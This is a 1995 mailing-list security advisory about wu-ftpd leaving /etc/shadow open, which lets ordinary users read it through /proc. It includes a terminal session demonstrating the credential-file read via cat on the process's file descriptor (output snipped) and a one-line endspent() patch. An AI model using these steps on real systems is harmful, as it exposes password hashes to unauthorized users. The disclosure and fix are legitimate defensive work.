[260] in linux-security and linux-alert archive
Another problem with wu-ftpd (shadow)
daemon@ATHENA.MIT.EDU (Marek Michalkiewicz)
Sat Jun 10 01:10:21 1995
From: Marek Michalkiewicz <marekm@i17linuxb.ists.pwr.wroc.pl>
To: linux-security@tarsier.cv.nrao.edu
Date: Fri, 9 Jun 1995 16:08:12 +0200 (MET DST)
Hi,
This affects wu-ftpd and possibly any other programs with incorrectly
hacked in shadow support. Non-shadow versions found in most Linux
distributions are not affected - or are all affected and you can't fix it
because /etc/passwd is world-readable, depending on how you look at it...
This is related to the /proc security problem discussed recently - normal
users can read /etc/shadow because this file is not closed and /proc gives
access to all open files.
Below is how to check if you are vulnerable:
Script started on Fri Jun 9 15:09:49 1995
marekm@i17linuxa:~$ ftp -n localhost
Connected to localhost.
220 i17linuxa FTP server (Version wu-2.4(2) Thu Jun 1 20:05:10 MET DST 1995) ready.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> user marekm
331 Password required for marekm.
Password:
230 User marekm logged in.
ftp> ^Z
[1]+ Stopped ftp -n localhost
marekm@i17linuxa:~$ ps uwx
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
marekm 15510 0.0 5.4 384 384 pp6 S 14:32 0:01 -bash
marekm 15808 0.2 2.2 29 156 pp6 S 15:09 0:00 script
marekm 15809 0.1 2.3 29 168 pp6 S 15:09 0:00 script
marekm 15810 1.3 6.7 377 472 pp4 S 15:09 0:00 bash -i
marekm 15811 0.7 3.9 113 276 pp4 T 15:09 0:00 ftp -n localhost
marekm 15812 2.0 7.1 157 500 con S 15:09 0:00 -localhost: marekm: IDLE
marekm 15816 0.0 3.1 64 224 pp4 R 15:10 0:00 ps uwx
marekm@i17linuxa:~$ ls -al /proc/15812/fd
total 0
dr-x------ 2 marekm users 0 Jun 9 15:10 .
dr-xr-xr-x 4 marekm users 0 Jun 9 15:10 ..
lrwx------ 1 marekm users 64 Jun 9 15:10 0 -> [0000]:0
lrwx------ 1 marekm users 64 Jun 9 15:10 1 -> [0000]:0
l-wx------ 1 marekm users 64 Jun 9 15:10 10 -> [0301]:4623
l-wx------ 1 marekm users 64 Jun 9 15:10 11 -> [0301]:4624
l-wx------ 1 marekm users 64 Jun 9 15:10 2 -> [0301]:10404
lrwx------ 1 marekm users 64 Jun 9 15:10 3 -> [0000]:0
lrwx------ 1 marekm users 64 Jun 9 15:10 4 -> [0000]:0
lr-x------ 1 marekm users 64 Jun 9 15:10 5 -> [0301]:38392
lr-x------ 1 marekm users 64 Jun 9 15:10 6 -> [0301]:8567
lrwx------ 1 marekm users 64 Jun 9 15:10 7 -> [0301]:34549
lr-x------ 1 marekm users 64 Jun 9 15:10 8 -> [0301]:8569
lr-x------ 1 marekm users 64 Jun 9 15:10 9 -> [0301]:32007
marekm@i17linuxa:~$ ls -i /etc/shadow
32007 /etc/shadow
marekm@i17linuxa:~$ cat /proc/15812/fd/9
[ snip - I don't want everyone to see my /etc/shadow :-) ]
marekm@i17linuxa:~$ fg
ftp -n localhost
221 Goodbye.
marekm@i17linuxa:~$ exit
Script done on Fri Jun 9 15:11:26 1995
OK, now for the fix:
--- ftpd.c.orig Thu Jun 1 19:27:42 1995
+++ ftpd.c Fri Jun 9 14:50:46 1995
@@ -996,6 +996,7 @@
struct spwd *spw = getspnam( pw->pw_name );
if( !spw ) { pw->pw_passwd = ""; }
else { pw->pw_passwd = spw->sp_pwdp; }
+ endspent();
}
#endif
Now /etc/shadow is correctly closed as soon as possible. The right fix
is IMHO to do some more checks in the kernel to remove /proc holes, but
I am not in a position to do it correctly... Linus, 1.2.10? :-)
Regards,
Marek Michalkiewicz
